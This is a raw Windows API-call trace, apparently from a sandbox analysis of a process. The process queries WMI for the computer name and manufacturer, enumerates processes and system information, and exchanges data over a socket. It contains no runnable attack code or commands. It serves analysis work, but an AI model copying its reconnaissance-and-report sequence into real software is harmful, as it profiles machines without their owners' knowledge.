	[0263.432] CoGetContextToken (in: pToken=0x5eae67c | out: pToken=0x5eae67c) returned 0x0
	[0263.432] IUnknown:AddRef (This=0x627513c) returned 0x3
	[0263.432] IEnumWbemClassObject:Next (in: This=0x627513c, lTimeout=-1, uCount=0x1, apObjects=0x38ef70, puReturned=0x2ff761c | out: apObjects=0x38ef70*=0x0, puReturned=0x2ff761c*=0x0) returned 0x1
	[0263.444] IUnknown:Release (This=0x627513c) returned 0x2
	[0263.444] CoGetContextToken (in: pToken=0x5eae7c4 | out: pToken=0x5eae7c4) returned 0x0
	[0263.444] WbemLocator:IUnknown:Release (This=0x3ba49c) returned 0x1
	[0263.444] IUnknown:Release (This=0x627513c) returned 0x0
	[0263.447] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6272088, puCount=0x5eae968 | out: puCount=0x5eae968*=0x2) returned 0x0
	[0263.447] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae964*=0x0, pszText=0x0 | out: puBuffLength=0x5eae964*=0x17, pszText=0x0) returned 0x0
	[0263.447] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae964*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae964*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.447] IWbemClassObject:Get (in: This=0x626e398, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae924*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff8444*=0, plFlavor=0x2ff8448*=0 | out: pVal=0x5eae924*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x2ff8444*=8, plFlavor=0x2ff8448*=64) returned 0x0
	[0263.447] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0263.448] IWbemClassObject:Get (in: This=0x626e398, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff8444*=8, plFlavor=0x2ff8448*=64 | out: pVal=0x5eae928*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x2ff8444*=8, plFlavor=0x2ff8448*=64) returned 0x0
	[0263.448] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0263.448] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6272088, puCount=0x5eae968 | out: puCount=0x5eae968*=0x2) returned 0x0
	[0263.448] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae964*=0x0, pszText=0x0 | out: puBuffLength=0x5eae964*=0x17, pszText=0x0) returned 0x0
	[0263.448] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae964*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae964*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.448] IWbemClassObject:Get (in: This=0x626e398, wszName="__CLASS", lFlags=0, pVal=0x5eae924*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff84fc*=0, plFlavor=0x2ff8500*=0 | out: pVal=0x5eae924*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x2ff84fc*=8, plFlavor=0x2ff8500*=64) returned 0x0
	[0263.448] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0263.448] IWbemClassObject:Get (in: This=0x626e398, wszName="__CLASS", lFlags=0, pVal=0x5eae928*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff84fc*=8, plFlavor=0x2ff8500*=64 | out: pVal=0x5eae928*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x2ff84fc*=8, plFlavor=0x2ff8500*=64) returned 0x0
	[0263.448] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0263.448] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6272088, puCount=0x5eae958 | out: puCount=0x5eae958*=0x2) returned 0x0
	[0263.448] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae954*=0x0, pszText=0x0 | out: puBuffLength=0x5eae954*=0x17, pszText=0x0) returned 0x0
	[0263.449] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae954*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae954*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.449] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6272088, puCount=0x5eae958 | out: puCount=0x5eae958*=0x2) returned 0x0
	[0263.449] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae954*=0x0, pszText=0x0 | out: puBuffLength=0x5eae954*=0x17, pszText=0x0) returned 0x0
	[0263.449] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae954*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae954*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.449] IWbemClassObject:GetNames (in: This=0x626e398, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5eae91c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5eae8e8 | out: pNames=0x5eae8e8*="\x01ƀ\x04") returned 0x0
	[0263.449] SafeArrayGetDim (psa=0x3ace50) returned 0x1
	[0263.449] SafeArrayGetDim (psa=0x3ace50) returned 0x1
	[0263.449] SafeArrayGetLBound (in: psa=0x3ace50, nDim=0x1, plLbound=0x5eae4e4 | out: plLbound=0x5eae4e4) returned 0x0
	[0263.449] IWbemClassObject:Get (in: This=0x626e398, wszName="__GENUS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff8f38*=0, plFlavor=0x2ff8f3c*=0 | out: pVal=0x5eae914*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x2ff8f38*=3, plFlavor=0x2ff8f3c*=64) returned 0x0
	[0263.450] IWbemClassObject:Get (in: This=0x626e398, wszName="__CLASS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff8f6c*=0, plFlavor=0x2ff8f70*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x2ff8f6c*=8, plFlavor=0x2ff8f70*=64) returned 0x0
	[0263.450] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0263.450] IWbemClassObject:Get (in: This=0x626e398, wszName="__SUPERCLASS", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff8fd0*=0, plFlavor=0x2ff8fd4*=0 | out: pVal=0x5eae914*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff8fd0*=8, plFlavor=0x2ff8fd4*=64) returned 0x0
	[0263.450] IWbemClassObject:Get (in: This=0x626e398, wszName="__DYNASTY", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff8ff8*=0, plFlavor=0x2ff8ffc*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x2ff8ff8*=8, plFlavor=0x2ff8ffc*=64) returned 0x0
	[0263.450] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0263.450] IWbemClassObject:Get (in: This=0x626e398, wszName="__RELPATH", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff905c*=0, plFlavor=0x2ff9060*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x2ff905c*=8, plFlavor=0x2ff9060*=64) returned 0x0
	[0263.450] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0263.451] IWbemClassObject:Get (in: This=0x626e398, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff90e0*=0, plFlavor=0x2ff90e4*=0 | out: pVal=0x5eae914*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x2ff90e0*=3, plFlavor=0x2ff90e4*=64) returned 0x0
	[0263.451] IWbemClassObject:Get (in: This=0x626e398, wszName="__DERIVATION", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff9114*=0, plFlavor=0x2ff9118*=0 | out: pVal=0x5eae914*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3ace50*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x3bd4e8, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x2ff9114*=8200, plFlavor=0x2ff9118*=64) returned 0x0
	[0263.451] IWbemClassObject:Get (in: This=0x626e398, wszName="__SERVER", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff914c*=0, plFlavor=0x2ff9150*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x2ff914c*=8, plFlavor=0x2ff9150*=64) returned 0x0
	[0263.451] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0263.451] IWbemClassObject:Get (in: This=0x626e398, wszName="__NAMESPACE", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff9198*=0, plFlavor=0x2ff919c*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x2ff9198*=8, plFlavor=0x2ff919c*=64) returned 0x0
	[0263.452] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0263.452] IWbemClassObject:Get (in: This=0x626e398, wszName="__PATH", lFlags=0, pVal=0x5eae914*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff91e8*=0, plFlavor=0x2ff91ec*=0 | out: pVal=0x5eae914*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x2ff91e8*=8, plFlavor=0x2ff91ec*=64) returned 0x0
	[0263.452] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0263.452] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6272088, puCount=0x5eae994 | out: puCount=0x5eae994*=0x2) returned 0x0
	[0263.452] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae990*=0x0, pszText=0x0 | out: puBuffLength=0x5eae990*=0x17, pszText=0x0) returned 0x0
	[0263.452] WbemDefPath:IWbemPath:GetText (in: This=0x6272088, lFlags=4, puBuffLength=0x5eae990*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae990*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.452] IWbemClassObject:Get (in: This=0x626e398, wszName="Manufacturer", lFlags=0, pVal=0x5eae950*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff92ec*=0, plFlavor=0x2ff92f0*=0 | out: pVal=0x5eae950*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CLEVO", varVal2=0x0), pType=0x2ff92ec*=8, plFlavor=0x2ff92f0*=32) returned 0x0
	[0263.452] SysStringLen (param_1="CLEVO") returned 0x5
	[0263.452] IWbemClassObject:Get (in: This=0x626e398, wszName="Manufacturer", lFlags=0, pVal=0x5eaea08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ff92ec*=8, plFlavor=0x2ff92f0*=32 | out: pVal=0x5eaea08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CLEVO", varVal2=0x0), pType=0x2ff92ec*=8, plFlavor=0x2ff92f0*=32) returned 0x0
	[0263.452] SysStringLen (param_1="CLEVO") returned 0x5
	[0263.453] send (s=0x420, buf=0x2ff9d0c*, len=32, flags=0) returned 32
	[0263.461] GetLastError () returned 0x0
	[0263.461] recv (in: s=0x420, buf=0x2fa0ffc, len=502, flags=0 | out: buf=0x2fa0ffc*) returned 90
	[0264.205] GetLastError () returned 0x0
	[0264.206] VirtualQuery (in: lpAddress=0x5eadd68, lpBuffer=0x5eaed68, dwLength=0x1c | out: lpBuffer=0x5eaed68*(BaseAddress=0x5ead000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0264.417] send (s=0x420, buf=0x301232c*, len=27, flags=0) returned 27
	[0264.417] GetLastError () returned 0x0
	[0264.417] recv (in: s=0x420, buf=0x2fa0ffc, len=502, flags=0 | out: buf=0x2fa0ffc*) returned 122
	[0265.205] GetLastError () returned 0x0
	[0265.206] VirtualQuery (in: lpAddress=0x5eadd68, lpBuffer=0x5eaed68, dwLength=0x1c | out: lpBuffer=0x5eaed68*(BaseAddress=0x5ead000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0265.264] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38ef58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.264] GetLastError () returned 0xcb
	[0265.445] EnumProcesses (in: lpidProcess=0x302eb54, cb=0x400, lpcbNeeded=0x5eae858 | out: lpidProcess=0x302eb54, lpcbNeeded=0x5eae858) returned 1
	[0265.448] GetLastError () returned 0x0
	[0265.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x39582b8, Length=0x20000, ResultLength=0x5eae7d8 | out: SystemInformation=0x39582b8, ResultLength=0x5eae7d8*=0xeac8) returned 0x0
	[0265.982] send (s=0x420, buf=0x308e754*, len=22, flags=0) returned 22
	[0265.983] GetLastError () returned 0x0
	[0265.983] recv (in: s=0x420, buf=0x2fa0ffc, len=502, flags=0 | out: buf=0x2fa0ffc*) returned 77
	[0266.210] GetLastError () returned 0x0
	[0266.211] VirtualQuery (in: lpAddress=0x5eadd68, lpBuffer=0x5eaed68, dwLength=0x1c | out: lpBuffer=0x5eaed68*(BaseAddress=0x5ead000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0266.319] send (s=0x420, buf=0x309bf44*, len=25, flags=0) returned 25
	[0266.320] GetLastError () returned 0x0
	[0266.320] recv (in: s=0x420, buf=0x2fa0ffc, len=502, flags=0 | out: buf=0x2fa0ffc*) returned 122
	[0267.203] GetLastError () returned 0x0
	[0267.204] VirtualQuery (in: lpAddress=0x5eadd68, lpBuffer=0x5eaed68, dwLength=0x1c | out: lpBuffer=0x5eaed68*(BaseAddress=0x5ead000, AllocationBase=0x5520000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0267.206] CoGetObjectContext (in: riid=0x2b3adb0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae8dc | out: ppv=0x5eae8dc*=0x2d8dec) returned 0x0
	[0267.206] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae8d4 | out: pAptType=0x5eae8d4*=1) returned 0x0
	[0267.206] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2b3ad98*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae8d8 | out: ppvObject=0x5eae8d8*=0x0) returned 0x80004002
	[0267.206] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0267.206] CoGetClassObject (in: rclsid=0x38bb74*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae3f4 | out: ppv=0x5eae3f4*=0x626dee8) returned 0x0
	[0267.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x626dee8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae224 | out: ppvObject=0x5eae224*=0x0) returned 0x80004002
	[0267.207] WbemDefPath:IClassFactory:CreateInstance (in: This=0x626dee8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae25c | out: ppvObject=0x5eae25c*=0x62750b0) returned 0x0
	[0267.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x62750b0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae000 | out: ppvObject=0x5eae000*=0x62750b0) returned 0x0
	[0267.207] WbemDefPath:IUnknown:QueryInterface (in: This=0x62750b0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eadfbc | out: ppvObject=0x5eadfbc*=0x0) returned 0x80004002
	[0267.208] WbemDefPath:IUnknown:AddRef (This=0x62750b0) returned 0x3
	[0267.208] CoGetContextToken (in: pToken=0x5eade48 | out: pToken=0x5eade48) returned 0x0
	[0267.208] WbemDefPath:IUnknown:QueryInterface (in: This=0x62750b0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eade30 | out: ppvObject=0x5eade30*=0x3beca8) returned 0x0
	[0267.208] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x3beca8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5eade38 | out: pCid=0x5eade38*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.208] WbemDefPath:IUnknown:Release (This=0x3beca8) returned 0x3
	[0267.208] CoGetContextToken (in: pToken=0x5eade40 | out: pToken=0x5eade40) returned 0x0
	[0267.208] WbemDefPath:IUnknown:AddRef (This=0x62750b0) returned 0x4
	[0267.208] WbemDefPath:IUnknown:QueryInterface (in: This=0x62750b0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eadeb4 | out: ppvObject=0x5eadeb4*=0x0) returned 0x80004002
	[0267.209] WbemDefPath:IUnknown:Release (This=0x62750b0) returned 0x3
	[0267.209] WbemDefPath:IUnknown:Release (This=0x62750b0) returned 0x2
	[0267.209] WbemDefPath:IUnknown:Release (This=0x626dee8) returned 0x0
	[0267.209] WbemDefPath:IUnknown:Release (This=0x62750b0) returned 0x1
	[0267.209] CoGetContextToken (in: pToken=0x5eae6f0 | out: pToken=0x5eae6f0) returned 0x0
	[0267.209] CoGetContextToken (in: pToken=0x5eae6b0 | out: pToken=0x5eae6b0) returned 0x0
	[0267.209] WbemDefPath:IUnknown:AddRef (This=0x62750b0) returned 0x2
	[0267.209] WbemDefPath:IUnknown:QueryInterface (in: This=0x62750b0, riid=0x5eae72c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae728 | out: ppvObject=0x5eae728*=0x62750b0) returned 0x0
	[0267.210] WbemDefPath:IUnknown:Release (This=0x62750b0) returned 0x2
	[0267.210] WbemDefPath:IUnknown:Release (This=0x62750b0) returned 0x1
	[0267.210] CoGetContextToken (in: pToken=0x5eae770 | out: pToken=0x5eae770) returned 0x0
	[0267.210] CoGetContextToken (in: pToken=0x5eae730 | out: pToken=0x5eae730) returned 0x0
	[0267.210] WbemDefPath:IUnknown:AddRef (This=0x62750b0) returned 0x2
	[0267.210] WbemDefPath:IUnknown:QueryInterface (in: This=0x62750b0, riid=0x5eae7ac*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5eae7a8 | out: ppvObject=0x5eae7a8*=0x62750b0) returned 0x0
	[0267.210] WbemDefPath:IUnknown:Release (This=0x62750b0) returned 0x2
	[0267.210] WbemDefPath:IUnknown:AddRef (This=0x62750b0) returned 0x3
	[0267.210] WbemDefPath:IWbemPath:SetText (This=0x62750b0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.211] WbemDefPath:IUnknown:Release (This=0x62750b0) returned 0x2
	[0267.211] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x62750b0, puCount=0x5eae914 | out: puCount=0x5eae914*=0x2) returned 0x0
	[0267.211] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae910*=0x0, pszText=0x0 | out: puBuffLength=0x5eae910*=0x17, pszText=0x0) returned 0x0
	[0267.211] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae910*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae910*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.211] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x62750b0, puCount=0x5eae910 | out: puCount=0x5eae910*=0x2) returned 0x0
	[0267.211] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae90c*=0x0, pszText=0x0 | out: puBuffLength=0x5eae90c*=0x17, pszText=0x0) returned 0x0
	[0267.211] WbemDefPath:IWbemPath:GetText (in: This=0x62750b0, lFlags=4, puBuffLength=0x5eae90c*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5eae90c*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0267.211] CoGetObjectContext (in: riid=0x2b3adb0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae88c | out: ppv=0x5eae88c*=0x2d8dec) returned 0x0
	[0267.211] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2d8dec, pAptType=0x5eae884 | out: pAptType=0x5eae884*=1) returned 0x0
	[0267.211] IUnknown:QueryInterface (in: This=0x2d8dec, riid=0x2b3ad98*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5eae888 | out: ppvObject=0x5eae888*=0x0) returned 0x80004002
	[0267.211] IUnknown:Release (This=0x2d8dec) returned 0x1
	[0267.211] CoGetClassObject (in: rclsid=0x382364*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5eae6dc | out: ppv=0x5eae6dc*=0x626dcc8) returned 0x0
	[0267.212] WbemLocator:IUnknown:QueryInterface (in: This=0x626dcc8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5eae50c | out: ppvObject=0x5eae50c*=0x0) returned 0x80004002
	[0267.212] WbemLocator:IClassFactory:CreateInstance (in: This=0x626dcc8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae544 | out: ppvObject=0x5eae544*=0x626dee8) returned 0x0
	[0267.212] WbemLocator:IUnknown:QueryInterface (in: This=0x626dee8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae2e8 | out: ppvObject=0x5eae2e8*=0x626dee8) returned 0x0
	[0267.212] WbemLocator:IUnknown:QueryInterface (in: This=0x626dee8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5eae2a4 | out: ppvObject=0x5eae2a4*=0x0) returned 0x80004002
	[0267.213] WbemLocator:IUnknown:AddRef (This=0x626dee8) returned 0x3
	[0267.213] CoGetContextToken (in: pToken=0x5eae130 | out: pToken=0x5eae130) returned 0x0
	[0267.213] WbemLocator:IUnknown:QueryInterface (in: This=0x626dee8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae118 | out: ppvObject=0x5eae118*=0x0) returned 0x80004002
	[0267.213] CoGetContextToken (in: pToken=0x5eae128 | out: pToken=0x5eae128) returned 0x0
	[0267.213] WbemLocator:IUnknown:AddRef (This=0x626dee8) returned 0x4
	[0267.213] WbemLocator:IUnknown:QueryInterface (in: This=0x626dee8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5eae19c | out: ppvObject=0x5eae19c*=0x0) returned 0x80004002
	[0267.214] WbemLocator:IUnknown:Release (This=0x626dee8) returned 0x3
